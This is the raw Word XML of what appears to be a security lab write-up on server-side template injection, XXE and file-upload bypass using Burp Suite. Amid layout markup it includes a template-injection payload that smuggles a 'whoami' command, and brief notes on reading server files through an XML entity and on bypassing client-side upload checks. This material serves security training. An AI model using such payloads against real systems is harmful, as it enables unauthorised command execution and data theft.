                <v:shape id="Shape 390" o:spid="_x0000_s1190" style="position:absolute;left:3333;top:6000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" path="m47625,23813v,3156,-604,6188,-1813,9106c44604,35833,42883,38410,40650,40649v-2232,2232,-4808,3953,-7725,5156c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1820c11783,44602,9207,42881,6975,40649,4742,38410,3021,35833,1813,32919,604,30001,,26969,,23813,,20650,604,17608,1813,14691,3021,11776,4742,9203,6975,6970,9207,4735,11783,3014,14700,1808,17617,605,20655,,23813,v3157,,6195,605,9112,1808c35842,3014,38418,4735,40650,6970v2233,2233,3954,4806,5162,7721c47021,17608,47625,20650,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 391" o:spid="_x0000_s1191" style="position:absolute;left:4857;top:5627;width:1666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1BF5E71F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="105"/>
                          </w:rPr>
                          <w:t>^2))}';whoami;)^2))}'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796BE5" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>6.Service side template injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542CF4FA" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="31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2A9ED351" wp14:editId="2A1D9488">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4106" name="Group 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6377" name="Shape 6377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6" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 6378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5BBEEAEB" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SSTI 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464719E1" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26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4BD7F188" wp14:editId="3659DD3A">
                <wp:extent cx="6581774" cy="561975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4107" name="Group 4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561975"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="561975"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6379" name="Shape 6379"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="54292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67"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="42883" y="919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0"/>
                                  <a:pt x="4742" y="9193"/>
                                  <a:pt x="6975" y="6967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3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85775" y="276978"/>
                            <a:ext cx="2334378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33E3" w14:textId="1C7FBEFF" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="106"/>
                                </w:rPr>
                                <w:t>Burp suite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6"/>
                                </w:rPr>
                                <w:t>template</w:t>
                              </w:r>
                              <w:r w:rsidR="00000000">
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:spacing w:val="12"/>
                                  <w:w w:val="10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32373F"/>
                                  <w:w w:val="106"/>
                                </w:rPr>
                                <w:t>injection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7F188" id="Group 4107" o:spid="_x0000_s1192" style="width:518.25pt;height:44.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 6379" o:spid="_x0000_s1193" style="position:absolute;top:5429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426" o:spid="_x0000_s1194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" path="m23813,v3157,,6195,605,9112,1808c35843,3017,38418,4738,40651,6967v2232,2226,3953,4803,5161,7724c47021,17608,47625,20650,47625,23813v,3156,-604,6188,-1813,9106c44604,35833,42883,38410,40651,40649v-2233,2226,-4808,3947,-7726,5156c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1820c11783,44596,9207,42875,6975,40649,4742,38410,3021,35833,1813,32919,604,30001,,26969,,23813,,20650,604,17608,1813,14691,3021,11770,4742,9193,6975,6967,9207,4738,11783,3017,14700,1808,17617,605,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 427" o:spid="_x0000_s1195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" path="m47625,23813v,3156,-604,6194,-1813,9109c44604,35840,42883,38410,40650,40649v-2232,2226,-4808,3947,-7725,5162c30008,47014,26970,47619,23813,47625v-3158,-6,-6196,-611,-9113,-1814c11783,44596,9207,42875,6975,40649,4742,38410,3021,35840,1813,32922,604,30007,,26969,,23813,,20650,604,17608,1813,14691,3021,11776,4742,9199,6975,6970,9207,4738,11783,3017,14700,1808,17617,605,20655,,23813,v3157,,6195,605,9112,1808c35842,3017,38418,4738,40650,6970v2233,2229,3954,4806,5162,7721c47021,17608,47625,20650,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 428" o:spid="_x0000_s1196" style="position:absolute;left:4857;top:2769;width:2334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5F9033E3" w14:textId="1C7FBEFF" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="106"/>
                          </w:rPr>
                          <w:t>Burp suite</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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6"/>
                          </w:rPr>
                          <w:t>template</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000">
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12"/>
                            <w:w w:val="106"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r w:rsidR="00000000">
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="106"/>
                          </w:rPr>
                          <w:t>injection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B8A4C8" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="286"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>SSTI 0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3696508B" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:left="765" w:hanging="615"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3088C659" wp14:editId="0A2E1ABA">
                <wp:extent cx="285750" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4112" name="Group 4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361950"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="361950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4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2" style="width:22.5pt;height:28.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="2857,3619">
                <v:shape id="Shape 430" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,608,32925,1811c35843,3014,38418,4738,40651,6976c42883,9209,44604,11782,45812,14697c47021,17618,47625,20650,47625,23813c47625,26969,47021,30007,45812,32922c44604,35837,42883,38410,40651,40649c38418,42875,35843,44593,32925,45802c30008,47011,26970,47625,23813,47625c20655,47625,17617,47011,14700,45802c11783,44593,9207,42875,6975,40649c4742,38410,3021,35837,1813,32922c604,30007,0,26969,0,23813c0,20650,604,17618,1813,14697c3021,11782,4742,9209,6975,6976c9207,4738,11783,3014,14700,1811c17617,608,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 431" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30007,45812,32922c44604,35837,42883,38416,40650,40649c38418,42881,35842,44599,32925,45814c30008,47017,26970,47625,23813,47625c20655,47625,17617,47017,14700,45814c11783,44599,9207,42881,6975,40649c4742,38416,3021,35837,1813,32922c604,30007,0,26969,0,23813c0,20656,604,17618,1813,14697c3021,11782,4742,9209,6975,6976c9207,4738,11783,3014,14700,1805c17617,602,20655,0,23813,0c26970,0,30008,602,32925,1805c35842,3014,38418,4738,40650,6976c42883,9209,44604,11782,45812,14697c47021,17618,47625,20656,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Same as the above one but the render is within the server and will not be reflected on the client side because of the java script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9CADB4" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="309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25C4159B" wp14:editId="6E7DB273">
                <wp:extent cx="6581774" cy="380243"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4108" name="Group 4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380243"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="380243"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6393" name="Shape 6393"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="265943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4" name="Shape 6394"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="361193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333375" y="373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8"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11783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85775" y="0"/>
                            <a:ext cx="919036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CC422" w14:textId="77777777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Hence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176784" y="0"/>
                            <a:ext cx="897417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52D71" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="112"/>
                                </w:rPr>
                                <w:t>www-data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851571" y="0"/>
                            <a:ext cx="5873106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A1474" w14:textId="4D8D2EB6" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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which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is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server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side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database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can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be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seen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10"/>
                                </w:rPr>
                                <w:t>burp suite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response.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4159B" id="Group 4108" o:spid="_x0000_s1197" style="width:518.25pt;height:29.95pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,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">
                <v:shape id="Shape 6393" o:spid="_x0000_s1198" style="position:absolute;top:2659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6394" o:spid="_x0000_s1199" style="position:absolute;top:3611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434" o:spid="_x0000_s1200" style="position:absolute;left:3333;top:37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" path="m47625,23813v,3156,-604,6194,-1813,9109c44604,35837,42883,38416,40650,40649v-2232,2226,-4808,3944,-7725,5159c30008,47011,26970,47625,23813,47625v-3158,,-6196,-614,-9113,-1817c11783,44593,9207,42875,6975,40649,4742,38416,3021,35837,1813,32922,604,30007,,26969,,23813,,20656,604,17618,1813,14697,3021,11776,4742,9203,6975,6976,9207,4738,11783,3014,14700,1811,17617,608,20655,,23813,v3157,,6195,608,9112,1811c35842,3014,38418,4738,40650,6976v2233,2227,3954,4800,5162,7721c47021,17618,47625,20656,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 435" o:spid="_x0000_s1201" style="position:absolute;left:4857;width:919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7C3CC422" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                          </w:rPr>
                          <w:t>Hence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202" style="position:absolute;left:11767;width:897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42952D71" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="112"/>
                          </w:rPr>
                          <w:t>www-data</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 437" o:spid="_x0000_s1203" style="position:absolute;left:18515;width:5873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5D7A1474" w14:textId="4D8D2EB6" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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which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is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server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side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database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can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be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seen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10"/>
                          </w:rPr>
                          <w:t>burp suite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response.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C0979F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>7.XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F85A8AC" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="31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6733C921" wp14:editId="48B7F1CC">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4109" name="Group 4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6461" name="Shape 6461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9" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 6462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15A49658" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="286"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>XXE 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662868DC" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="160" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53C3EDC8" wp14:editId="1E860739">
                <wp:extent cx="285750" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4113" name="Group 4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361950"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="361950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20"/>
                                  <a:pt x="38418" y="4744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3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4"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11783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3" style="width:22.5pt;height:28.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="2857,3619">
                <v:shape id="Shape 440" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,608,32925,1811c35843,3020,38418,4744,40651,6976c42883,9203,44604,11776,45812,14697c47021,17611,47625,20650,47625,23813c47625,26969,47021,30007,45812,32928c44604,35843,42883,38416,40651,40649c38418,42881,35843,44599,32925,45808c30008,47017,26970,47625,23813,47625c20655,47625,17617,47017,14700,45808c11783,44599,9207,42881,6975,40649c4742,38416,3021,35843,1813,32928c604,30007,0,26969,0,23813c0,20650,604,17611,1813,14697c3021,11776,4742,9203,6975,6976c9207,4744,11783,3020,14700,1811c17617,608,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 441" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30007,45812,32922c44604,35837,42883,38416,40650,40649c38418,42881,35842,44599,32925,45802c30008,47017,26970,47625,23813,47625c20655,47625,17617,47017,14700,45814c11783,44605,9207,42881,6975,40649c4742,38416,3021,35837,1813,32922c604,30007,0,26969,0,23813c0,20656,604,17618,1813,14697c3021,11776,4742,9203,6975,6976c9207,4738,11783,3014,14700,1805c17617,602,20655,0,23813,0c26970,0,30008,608,32925,1811c35842,3014,38418,4738,40650,6976c42883,9203,44604,11776,45812,14697c47021,17618,47625,20656,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> The lab has pre defined files under</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374BB749" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="309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6CFC8F6" wp14:editId="3C5D4222">
                <wp:extent cx="6581774" cy="1208919"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4110" name="Group 4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208919"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="1208919"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6463" name="Shape 6463"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1189869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85775" y="0"/>
                            <a:ext cx="1636635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1CD4" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="114"/>
                                </w:rPr>
                                <w:t>/labs/user-content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95250" y="36119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3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33375" y="67551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5775" y="638175"/>
                            <a:ext cx="1622996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046A2" w14:textId="38BE89FD" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>&amp;</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:spacing w:val="-1"/>
                                  <w:w w:val="107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7"/>
                                </w:rPr>
                                <w:t>Amberson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7"/>
                                </w:rPr>
                                <w:t>entity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333375" y="96126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5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3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5775" y="923925"/>
                            <a:ext cx="5122754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2EC04" w14:textId="74FD62E9" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>One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file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is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7"/>
                                </w:rPr>
                                <w:t>uploads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,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we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will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get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sensitive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7"/>
                                </w:rPr>
                                <w:t>information.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FC8F6" id="Group 4110" o:spid="_x0000_s1204" style="width:518.25pt;height:95.2pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,1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">
                <v:shape id="Shape 6463" o:spid="_x0000_s1205" style="position:absolute;top:11898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rect id="Rectangle 443" o:spid="_x0000_s1206" style="position:absolute;left:4857;width:1636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68281CD4" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="114"/>
                          </w:rPr>
                          <w:t>/labs/user-content</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 444" o:spid="_x0000_s1207" style="position:absolute;left:952;top:3611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" path="m23813,v3157,,6195,602,9112,1805c35843,3014,38418,4738,40651,6976v2232,2227,3953,4800,5161,7721c47021,17618,47625,20656,47625,23813v,3150,-604,6188,-1813,9103c44604,35830,42883,38410,40651,40649v-2233,2232,-4808,3950,-7726,5153c30008,47011,26970,47625,23813,47625v-3158,,-6196,-614,-9113,-1823c11783,44599,9207,42881,6975,40649,4742,38410,3021,35830,1813,32916,604,30001,,26963,,23813,,20656,604,17618,1813,14697,3021,11776,4742,9203,6975,6976,9207,4738,11783,3014,14700,1805,17617,602,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 445" o:spid="_x0000_s1208" style="position:absolute;left:3333;top:6755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" path="m47625,23813v,3156,-604,6194,-1813,9109c44604,35837,42883,38410,40650,40649v-2232,2232,-4808,3950,-7725,5159c30008,47017,26970,47625,23813,47625v-3158,,-6196,-608,-9113,-1817c11783,44599,9207,42881,6975,40649,4742,38410,3021,35837,1813,32922,604,30007,,26969,,23813,,20650,604,17611,1813,14697,3021,11776,4742,9196,6975,6970,9207,4738,11783,3014,14700,1811,17617,608,20655,,23813,v3157,,6195,602,9112,1805c35842,3014,38418,4738,40650,6970v2233,2226,3954,4806,5162,7727c47021,17611,47625,20650,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 446" o:spid="_x0000_s1209" style="position:absolute;left:4857;top:6381;width:1623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677046A2" w14:textId="38BE89FD" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>&amp;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="107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7"/>
                          </w:rPr>
                          <w:t>Amberson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7"/>
                          </w:rPr>
                          <w:t>entity</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 447" o:spid="_x0000_s1210" style="position:absolute;left:3333;top:9612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" path="m47625,23813v,3162,-604,6194,-1813,9115c44604,35843,42883,38416,40650,40649v-2232,2232,-4808,3950,-7725,5159c30008,47017,26970,47625,23813,47625v-3158,,-6196,-608,-9113,-1817c11783,44599,9207,42881,6975,40649,4742,38416,3021,35843,1813,32928,604,30007,,26975,,23813,,20650,604,17618,1813,14697,3021,11776,4742,9203,6975,6976,9207,4744,11783,3020,14700,1811,17617,608,20655,,23813,v3157,,6195,608,9112,1811c35842,3020,38418,4744,40650,6976v2233,2227,3954,4800,5162,7721c47021,17618,47625,20650,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 448" o:spid="_x0000_s1211" style="position:absolute;left:4857;top:9239;width:5122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54F2EC04" w14:textId="74FD62E9" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>One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file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is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7"/>
                          </w:rPr>
                          <w:t>uploads</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>,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we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will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get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sensitive</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="1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7"/>
                          </w:rPr>
                          <w:t>information.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C32C8E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>8.File upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509136E6" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="31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60BEF81A" wp14:editId="1940F0EA">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4111" name="Group 4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6525" name="Shape 6525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1" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 6526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6DF4045F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="286"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>File upload 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4558A327" w14:textId="3A345E20" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="83" w:line="321" w:lineRule="auto"/>
        <w:ind w:left="765" w:hanging="615"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B66F0F6" wp14:editId="6736F0CC">
                <wp:extent cx="285750" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4114" name="Group 4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361950"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="361950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4"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11783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4" style="width:22.5pt;height:28.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="2857,3619">
                <v:shape id="Shape 451" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,602,32925,1805c35843,3014,38418,4738,40651,6970c42883,9203,44604,11776,45812,14697c47021,17611,47625,20650,47625,23813c47625,26969,47021,30007,45812,32922c44604,35837,42883,38416,40651,40649c38418,42881,35843,44599,32925,45802c30008,47017,26970,47625,23813,47625c20655,47625,17617,47017,14700,45808c11783,44599,9207,42881,6975,40649c4742,38416,3021,35837,1813,32922c604,30007,0,26969,0,23813c0,20650,604,17605,1813,14691c3021,11776,4742,9203,6975,6970c9207,4738,11783,3014,14700,1805c17617,602,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 452" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30007,45812,32922c44604,35837,42883,38416,40650,40649c38418,42881,35842,44605,32925,45814c30008,47017,26970,47625,23813,47625c20655,47625,17617,47017,14700,45814c11783,44605,9207,42881,6975,40649c4742,38416,3021,35843,1813,32928c604,30007,0,26969,0,23813c0,20650,604,17611,1813,14697c3021,11776,4742,9203,6975,6976c9207,4738,11783,3014,14700,1805c17617,602,20655,0,23813,0c26970,0,30008,608,32925,1811c35842,3014,38418,4738,40650,6976c42883,9203,44604,11776,45812,14697c47021,17611,47625,20650,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Change file type and content of the file in burp as the file are saved in client side on only and </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>does not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>interact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the server .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7477E5B5" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="5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C09D72" wp14:editId="1565085E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>333375</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>37343</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="47625" cy="904875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4115" name="Group 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904875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="47625" cy="904875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8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4"/>
                                  <a:pt x="11783" y="3020"/>
